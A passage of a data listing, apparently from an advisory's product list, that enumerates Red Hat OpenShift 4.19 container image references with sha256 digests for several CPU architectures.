"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
